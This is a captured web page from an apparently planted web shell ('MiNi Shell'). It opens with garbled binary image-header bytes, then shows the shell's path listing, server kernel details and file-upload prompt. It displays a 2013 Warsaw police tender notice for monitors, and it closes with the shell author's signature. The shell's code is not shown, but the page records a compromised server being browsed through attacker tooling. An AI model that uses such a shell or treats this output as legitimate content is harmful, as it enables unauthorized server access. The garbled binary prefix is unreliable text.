JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130130/16221-N-2013.html

<p class="kh_header"><b>Warszawa: Dostawa monitorów</b><br>
<b>Numer ogłoszenia: 16221 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Stołeczna Policji , ul. Nowolipie 2, 00-150 Warszawa, woj. mazowieckie, tel. 22 6038608. 6037691, faks 22 6037642.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.policja.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa monitorów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy (sukcesywnie wg potrzeb Zamawiającego) monitorów 19 calowych w ilości szacunkowej 30 szt., o parametrach:a) monitor do pracy ciągłej; b) wielkość ekranu - 19 cali; c) rozdzielczość - min. 1280 x 1024; d) gniazda podłączeniowe - 1 wejście VGA, 2x video composite (BNC), 1x HDMI; e) ekran - ochrona ekranu z wbudowanym szkłem ochronnym; f) kontrast - min. 800:1; g) jasność - min. 250 cd/m2; h) funkcje wyświetlania - (PIP, PBP, VOV) oraz wejście zewnętrznego wyzwalania; i) czas reakcji plamki - max. 5ms; j) mocowanie uchwytu - VESA. Zamawiający wymaga, aby oferowane monitory były trwale oznaczone znakiem CE.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.51.00-4.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza, na pisemny wniosek Wykonawcy zmianę w zakresie
Producenta/parametrów monitorów wskazanych w załączniku do umowy,pod warunkiem, że
monitory zamienne będą posiadały parametry nie gorsze niż wskazane w załączniku do umowy oraz
przy zachowaniu pozostałych warunków umowy, w tym ceny jednostkowej nie wyższej niż
wskazana w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> www.licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> nie dotyczy</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> Wykonawcy chcący wziąć udział w przedmiotowej licytacji są zobowiązani do dokonania uprzedniej
rejestracji na platformie do prowadzenia licytacji elektronicznych, zwanej dalej platformą,
zamieszczonej na stronie www.licytacje.uzp.gov.pl, o ile nie są jeszcze zarejestrowani (nie jest
wymagany podpis elektroniczny). Powyższej rejestracji wykonawca powinien dokonać przed
wysłaniem wniosku o dopuszczenie do udziału w licytacji , a wraz z ww. wnioskiem przesłać
zamawiającemu informację o swoim loginie. Login Wykonawca otrzyma po zarejestrowaniu się na
ww. platformie. W przypadku podania przez Wykonawcę niewłaściwego loginu, bądź nieprzekazanie
go zamawiającemu wraz z wnioskiem, Wykonawca zobowiązany jest do jego przekazania najpóźniej
jeden dzień przed terminem otwarcia licytacji. Korzystanie z oprogramowania jest bezpłatne.
Jedynym warunkiem jest zarejestrowanie się w systemie. Przed rozpoczęciem korzystania z
platformy zaleca się zapoznanie z Samouczkiem oraz wersją demonstracyjną znajdującą się na ww.
platformie. Pomoc techniczną w zakresie funkcjonowania systemu,zgłaszanie ewentualnych błędów,
można uzyskać pod numerem telefonu 022 632 28 84, w godzinach: 9:00 - 13:00. Wymagania
techniczne urządzeń informatycznych, umożliwiających sprawne korzystanie z niniejszego systemu:
Komputer PC z systemem operacyjnym Windows/Linux oraz przeglądarka internetowa Internet
Explorer 6.0 lub wyższa lub Mozilla Firefox 2.0 lub wyższa. Zamawiający dopuści do udziału w
licytacji elektronicznej i zaprosi do składania ofert wszystkich Wykonawców, którzy spełnią warunki
udziału w postępowaniu. Zaproszenie zostanie wysłane fax-em lub drogą elektroniczną na adres
e-mail wskazany we wniosku o dopuszczenie do udziału w licytacji elektronicznej Wzór stanowi
Załącznik nr 1 do ogłoszenia zamieszczony na stronie www.przetargi.policja.waw.pl..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. po zalogowaniu się Wykonawcy uzyskują dostęp do aplikacji umożliwiającej składanie ofert; 2.
Zamawiający ustalił cenę wywoławczą na kwotę 47.138,40 zł brutto; 3. Zamawiający określił
minimalną wysokość postąpienia na 50,00 zł brutto. System nie przyjmie postąpienia, którego
wysokość jest mniejsza od określonego minimalnego postąpienia. Wysokość postąpienia jest liczona
w odniesieniu do najkorzystniejszej oferty złożonej w danej licytacji. System dopuszcza składanie
postąpień z dokładnością do jednego grosza, grosze należy oddzielić kropką. 4. od momentu
otwarcia licytacji do jej zamknięcia Wykonawcy składają kolejne, korzystniejsze postąpienia w
postaci elektronicznej, które podlegają automatycznej klasyfikacji na podstawie ceny. System
umożliwia składanie wyłącznie ofert o cenie niższej niż oferta wiodąca w danym momencie; 5.
oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą.
Wykonawca nie może cofnąć raz złożonej oferty. Użytkownicy ponoszą odpowiedzialność za
informacje wprowadzone do systemu i konsekwencje z tego wynikające. Z dniem 15 października
2009 r. do systemu licytacji elektronicznych UZP została wprowadzona zmiana polegająca na
żądaniu potwierdzenia składanej oferty w sytuacji, gdy stanowi ona mniej niż 50% ceny oferty
najkorzystniejszej. Wprowadzenie ww. zmiany powoduje, iż w przypadku składania oferty
stanowiącej mniej niż 50% ceny oferty najkorzystniejszej, momentem złożenia postąpienia będzie
naciśnięcie przycisku potwierdzającego chęć złożenia oferty o wskazanej wartości; 6. w trakcie
licytacji elektronicznej system na bieżąco udostępnia wszystkim Wykonawcom informacje o pozycji
złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, oraz
cenach złożonych przez nich ofert, z tym że do momentu zamknięcia licytacji elektronicznej nie
ujawnia się informacji umożliwiających identyfikację Wykonawców; 7. w toku licytacji Wykonawcy
proponują cenę oferty brutto wyrażoną w złotych. Zaproponowana cena obejmuje wszystkie koszty i
składniki związane z wykonaniem zamówienia oraz warunkami stawianymi przez Zamawiającego, w
tym koszty dostawy monitorów do wskazanych pomieszczeń w siedzibie Zamawiającego oraz należny
podatek VAT. Zamawiający nie zapewnia zwolnienia Wykonawcy z żadnych podatków, opłat, ani nie
będzie zwracał żadnych kar należnych z jakiegokolwiek tytułu, cen transportu, czynności, usług,
świadczeń, opłat, ceł, podatków itp., których nie przewidziano w ogłoszeniu. Ryzyko konieczności
wykonania wszelkich prac towarzyszących, mogących pojawić się w trakcie realizacji zamówienia,
ryzyko związane ze zmianami kursów walut, ceł itp., obciąża Wykonawcę i należy uwzględnić je w
ofercie; 8. Zamawiający bezpośrednio po zamknięciu licytacji poda pod wskazanym w ogłoszeniu
adresem internetowym nazwę Wykonawcy, którego ofertę wybrano; 9. Wykonawca, którego oferta
zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy wypełni formularz cenowy
poprzez wpisanie do niego ceny jednostkowej brutto w PLN i cenę brutto w PLN przedmiotu umowy.Wypełniony i podpisany formularz cenowy, Wzór stanowi Załącznik nr 3
do ogłoszenia zamieszczony na stronie www.przetargi.policja.waw.pl, stanowić będzie załącznik do
umowy w sprawie zamówienia publicznego. Wartość przedmiotu umowy wykazana w formularzu
musi być tożsama z ceną najkorzystniejszej oferty tego Wykonawcy. Zaproponowana przez niego
cena będzie stała w czasie objętym umową. Zapłata nastąpi zgodnie z warunkami umowy - Załącznik
nr 4 do ogłoszenia..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 30 minut</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 07.02.2013 godzina 12:00, miejsce: Wnioski należy złożyć w siedzibie Zamawiającego - Punkt Obsługi Interesanta KSP, Warszawa, ul.Nowolipie 2, który czynny jest w godz. 7.00. - 17.00. od poniedziałku do piątku lub przesłać pocztą.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni po terminie przekazania zaproszeń, o godzinie 10:00.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>upływa w dniu otwarcia o godzinie 10:30</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>I. Wymagane jest wniesienie zabezpieczenia należytego wykonania umowy w wysokości 5%wartości umowy, stanowiącej cenę oferty wybranego Wykonawcy. Zabezpieczenie powinno być
wniesione do dnia podpisania umowy, na pełny okres realizacji umowy z uwzględnieniem okresu
ustawowego rękojmi - 12 miesięcy. 
II. Zabezpieczenie może być wnoszone według wyboru
wykonawcy w jednej lub w kilku następujących formach: 1.pieniądzu - przelewem na rachunek
Zamawiającego: 64 1010 1010 0056 5613 9120 0000;  2. poręczeniach bankowych lub poręczeniach
spółdzielczej kasy oszczędnościowo-kredytowej z tym, że zobowiązanie kasy jest zawsze
zobowiązaniem pieniężnym, 3.gwarancjach bankowych, 4.gwarancjach ubezpieczeniowych,
5.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9
listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
III. Poręczenie lub gwarancja stanowiące formę zabezpieczenia należytego wykonania umowy winno zawierać
stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty z tytułu
nienależytego wykonania umowy, zgodnie z warunkami umowy, następuje jego bezwarunkowa
wypłata,bez jakichkolwiek zastrzeżeń gwaranta-poręczyciela w treści dokumentu w stosunku do
Zamawiającego, do wysokości sumy gwarancyjnej. Za niedopuszczalne Zamawiający uznaje się
zapisy: a. skutkujące obciążeniem Zamawiającego jakimikolwiek kosztami, np. wynikającymi z
dostarczenia Gwarantowi dokumentu poświadczającego umocowanie osób podpisujących wezwanie
do zapłaty, potwierdzonego przez Bank prowadzący rachunek Zamawiającego lub notariusza, b.
uzależniające wypłatę Zamawiającego należności od wcześniejszego wezwania Wykonawcy do
usunięcia wady wynikającej z nienależytego wykonania umowy oraz przesłania kopii tego wezwania
Gwarantowi. Jedynym dopuszczalnym warunkiem, który może znaleźć się w treści gwarancji jest
poniższy zapis: W celu identyfikacji osób uprawnionych do reprezentacji Beneficjenta żądanie musi
być podpisane przez osobę wskazaną w statucie zamieszczonym na stronie internetowej Komendy
Stołecznej Policji lub przez inną upoważnioną osobę wraz z kopią upoważnienia poświadczoną za
zgodność z oryginałem przez osobę, do której należy upoważnienie.
IV. Zamawiający dokona zwrotu zabezpieczenia należytego wykonania umowy odpowiednio: 1. 70% zabezpieczenia zostanie
zwrócone w terminie 30 dni po podpisaniu bez uwag protokołu odbioru ostatniej dostawy i po
uznaniu przez Zamawiającego, że umowa została należycie wykonana, 2. 30% kwoty
zabezpieczenia zostanie zwrócone w terminie 15 dni po upływie okresu rękojmi,o którym mowa w
pkt 1.</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Istotne dla stron postanowienia umowy zawarte są w Załączniku nr 4 do ogłoszenia zamieszczonego
na stronie www.przetargi.policja.waw.pl</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zaleca się, aby Wniosek o dopuszczenie do licytacji
Wykonawcy wraz z wszystkimi załącznikami, były podpisane w sposób pozwalający na
zidentyfikowanie składającego podpis)przez Wykonawcę lub osobę/osoby upoważnioną do
występowania w imieniu Wykonawcy lub przez inną upoważnioną osobę przez Wykonawcę. W
przypadku, gdy z dokumentów załączonych do oferty nie będzie wynikać, iż osoba podpisująca
dokumenty jest upoważniona do występowania w imieniu Wykonawcy, Wykonawca dołączy do oferty
dokument potwierdzający uprawnienie do jego reprezentowania (np. wydruk z Centralnej Ewidencji i Informacji o Działalności Gospodarczej RP). W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do
oferty musi być załączony oryginał lub kopia pełnomocnictwa potwierdzona za zgodność z
oryginałem przez notariusza. Gdy pełnomocnictwo sporządzone jest w języku obcym, jego
tłumaczenie na język polski musi być sporządzone przez tłumacza przysięgłego. Z pełnomocnictwa
powinien wynikać zakres czynności, do których umocowany jest pełnomocnik. Wyżej wymienione
zapisy stosuje się również do upoważnienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com